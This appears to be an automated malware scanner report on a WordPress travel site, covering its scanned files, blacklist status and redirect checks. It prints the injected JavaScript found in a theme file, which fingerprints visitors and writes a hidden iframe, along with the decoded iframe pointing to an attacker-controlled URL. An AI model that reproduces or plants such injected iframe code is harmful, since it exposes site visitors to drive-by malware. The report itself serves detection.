New scan:

Malware Scanner report for turistos-master.ru

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://turistos-master.ru/
200 OK
Content-Length: 55601
Content-Type: text/html
clean
http://turistos-master.ru/wp-content/themes/tree-house/dhtml.js
200 OK
Content-Length: 2255
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ffff_listier_ua(){
var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire
... 1330 bytes are skipped ...
" name="Anatoli"></'+'ifr'+'ame>');
}
}
})();
navHover = function()
{
var lis = document.getElementById("nav").getElementsByTagName("LI");
for (var i=0; i<lis.length; i++) {
lis[i].onmouseover=function() {
this.className+=" iehover";
}
lis[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(" iehover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", navHover);

Decoded script:


function () {
var lis = document.getElementById("nav").getElementsByTagName("LI");
for (var i = 0; i < lis.length; i++) {
lis[i].onmouseover = function () {this.className += " iehover";};
lis[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" iehover\\b"), "");};
}
}
<iframe src="http://scsczero.hycrete.com.br/jtrsdhtrjtydkytk8.html" style="position:absolute;left:-1309px;top:-1309px;" height="175" width="175" name="Anatoli"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://turistos-master.ru/?feed=rss2
200 OK
Content-Length: 41019
Content-Type: text/html
clean
http://turistos-master.ru/wp-content/uploads/2013/02/mardi_gras_019.jpg
200 OK
Content-Length: 62716
Content-Type: image/jpeg
clean
http://turistos-master.ru/test404page.js
404 Not Found
Content-Length: 1
Content-Type: text/html
clean
http://turistos-master.ru/wp-content/uploads/2012/12/sydney-aquarium.jpg
200 OK
Content-Length: 228334
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/12/1271101015_1271084929_1271008531_pink-lake-01.jpg
200 OK
Content-Length: 68229
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/39078737_1233590153_1656.jpg
200 OK
Content-Length: 84628
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/be7b5c4a7132525444394bae0bd7d66b585120111136843.jpg
200 OK
Content-Length: 62374
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/12688929551220717740_0_5.jpg
200 OK
Content-Length: 45215
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/argyle_cove.jpg
200 OK
Content-Length: 91540
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/09/queen-victoria-building-sydney-ipoh-garden-berhad3.jpg
200 OK
Content-Length: 196138
Content-Type: image/jpeg
clean
http://turistos-master.ru/wp-content/uploads/2012/08/stud.png
200 OK
Content-Length: 300084
Content-Type: image/png
clean
http://turistos-master.ru/wp-content/uploads/2012/08/1.jpg
200 OK
Content-Length: 57625
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: turistos-master.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 04 Oct 2014 08:18:34 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 55601
Content-Type: text/html;charset=utf-8
Expires: Tue, 07 Oct 2014 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17

...55601 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: turistos-master.ru
Referer: http://www.google.com/search?q=turistos-master.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=turistos-master.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turistos-master.ru/

Result: turistos-master.ru is not infected or malware details are not published yet.